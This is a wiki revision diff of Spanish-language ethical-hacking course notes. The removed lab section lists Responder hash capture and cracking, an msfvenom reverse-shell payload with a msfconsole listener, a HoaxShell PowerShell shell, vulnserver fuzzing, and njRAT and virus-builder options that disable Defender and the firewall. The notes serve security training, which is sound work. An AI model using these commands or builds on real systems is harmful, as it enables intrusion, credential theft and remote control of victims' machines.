info:cursos:pue:ethical-hacker:sesion2

Diferències

Ací es mostren les diferències entre la revisió seleccionada i la versió actual de la pàgina.

Enllaç a la visualització de la comparació

Ambdós costats versió prèvia Revisió prèvia
Següent revisió
Revisió prèvia
info:cursos:pue:ethical-hacker:sesion2 [19/02/2025 07:28] mateinfo:cursos:pue:ethical-hacker:sesion2 [20/02/2025 23:51] (actual) mate
Línia 151: Línia 151:
   * Registro Windows MRU (Most Recently Used)   * Registro Windows MRU (Most Recently Used)
   * ''history''   * ''history''
- 
-=== Lab Module 01: Sytem hacking 
-==== Task 1: Perform Active Online Attack to Crack the System’s Password using Responder 
-  - ''sudo responder -I eth0'' -> capturar hash máquina W11 en txt -> hash.txt 
-  - ''john hash.txt'' -> desencripta la contraseña del hash 
- 
-==== Task 2: Gain Access to a Remote System using Reverse Shell Generator 
-===== cmd 
-  * ''docker run -d -p 80:80 reverse_shell_generator'' 
-  * ''http://localhost'' 
-    * IP, Port, MSFVenom -> genera instrucción: ''msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f exe -o reverse.exe'' 
-    * se genera un EXE - payload (que hemos de conseguir que ejecute la víctima) 
-    * generamos la instrucción para escuchar el payload, en la sección LISTENER, modo **msfconsole** 
-      * ''msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.1.13; set lport 4444; exploit"'' 
-    * ejecutamos el listener, ejecutamos el payload 
-      * ''getuid'' 
- 
-===== powershell 
-  * ''http://localhost'' 
-    * HoaxShell -> PowerShell IEX -> cambiar puerto en el script generado por 444 
-    * copiar y guardar en shell.ps1 
-    * ir a la sección **listener** y generar para HoaxShell (puerto 444) 
-    * ejecutar instrucción generada con sudo: ''sudo python...'' 
-    * ejecutamos en un powershell subido a Administrador el script .ps1 
- 
-==== Task 3: Perform Buffer Overflow Attack to Gain Access to a Remote System 
-  * ejecutar como administrador ''vulnserver'' (buffer overflow tools) 
-  * instalar **ImmunityDebugger_1_85_setup.exe** (y Python 2.7) 
-  * ejecutar como administrador 
-    * File -> Attach -> vulnserver <- pausado 
-    * Icono PLAY 
-  * en Linux, ejecutamos ''nc -nv 10.10.1.11 9999'' 
-    * HELP nos lista los comandos disponibles 
-    * QUIT para salir 
-    * creamos un "spike template" -> ''pluma stats.spk'':<code>s_readline(); 
- 
-s_string(“STATS ”); 
- 
-s_string_variable(“0”);</code> 
-    * ''generic_send_tcp 10.10.1.11 9999 stats.spk 0 0'' 
-      * los dos últimos ceros son SKIPVAR y SKIPSTR 
-    * ejecuta y podemos ver en ImmunityDebugger que la opción STAT no es vulnerable 
-    * Se hace lo mismo cambiando **STAT** por **TRUN** 
-    * PENDIENTE 
- 
-=== Lab 2 Module 06 : Perform Privilege Escalation to Gain Higher Privileges 
-==== Task 1: Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys 
-  * PENDIENTE 
- 
-=== Lab 3 Module 06 : Maintain Remote Access and Hide Malicious Activities 
-==== Task 1: User System Monitoring and Surveillance using Spyrix 
-==== Task 2: Maintain Persistence by Modifying Registry Run Keys 
-=== Lab 4 Module 06: Clear Logs to Hide the Evidence of Compromise 
-==== Task 1: Clear Windows Machine Logs using Various Utilities 
-==== Task 2: Clear Linux Machine Logs using the BASH Shell 
-=== Lab 5 Module 06: Perform Active Directory (AD) Attacks Using Various Tools 
-==== Task 1: Perform Initial Scans to Obtain Domain Controller IP and Domain Name 
-==== Task 2: Perform AS-REP Roasting Attack 
-==== Task 3: Spray Cracked Password into Network using CrackMapExec. 
-==== Task 4: Perform Post-Enumeration using PowerView 
-==== Task 5: Perform Attack on MSSQL service 
-==== Task 6: Perform Privilege Escalation 
-==== Task 7: Perform Kerberoasting Attack 
-=== Lab 6 Module 06: Perform System Hacking using AI 
-==== Task 1: Perform System Hacking using ShellGPT 
- 
  
  
Línia 272: Línia 206:
   * https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-atp-linux - Microsoft Defender ATP for Linux   * https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-atp-linux - Microsoft Defender ATP for Linux
  
-=== Lab 1: Gain Access to the Target System using Trojans 
-==== Task 1: Gain Control over a Victim Machine using the njRAT RAT Trojan 
-  * njRAT v0.8d 
-    * puerto 5553 
-    * Build 
-      * Host (IP máquina local) 
-      * Randomize Stub 
-      * USB Spread Nj8d 
-      * Protect Process (BSOD) 
-    * Copiar .exe en maquina víctima y ejecutar 
-    * en ese mismo momento, aparece información en el RAT {{:info:cursos:pue:ethical-hacker:pasted:20250218-063959.png?300}} 
-      * archivos 
-      * tareas 
-      * registro 
-      * remote desktop 
-      * control de camara 
-      * keylogger 
- 
-=== Lab 2: Infect the Target System using a Virus 
-==== Task 1: Create a Virus using the JPS Virus Maker Tool and Infect the Target System 
-  * JPS Virus Maker 
-    * marcar Auto Startup 
-    * Disable TaskManager 
-    * Disable Windows Update 
-    * Disable Control Panel 
-    * Disable Drives 
-    * Hide Desktop Icons 
-    * Enable Remote Desktop 
-    * Remove Bluetooth 
-    * Turn Off Windows Firewall 
-    * Turn Off Windows Defender 
-    * en opciones: 
-      * Change Windows Password 
-      * Change Computer Name 
-      * Enable Convert to Worm 
-      * JPG Icon 
- 
-=== Lab 3: Perform Static Malware Analysis 
-==== Task 1: Perform Malware Scanning using Hybrid Analysis 
-  * https://hybrid-analysis.com 
-==== Task 2: Analyze ELF Executable File using Detect It Easy (DIE) 
-  * Detect It Easy v3.09 
-==== Task 3: Perform Malware Disassembly using IDA and OllyDbg 
-  * IDA Freeware 8.4 
-=== Lab 4 Module 07: Perform Dynamic Malware Analysis 
-==== Task 1: Perform Port Monitoring using TCPView and CurrPorts 
-==== Task 2: Perform Process Monitoring using Process Monitor 
  
  
  • info/cursos/pue/ethical-hacker/sesion2.1739978936.txt.gz
  • Darrera modificació: 19/02/2025 07:28
  • per mate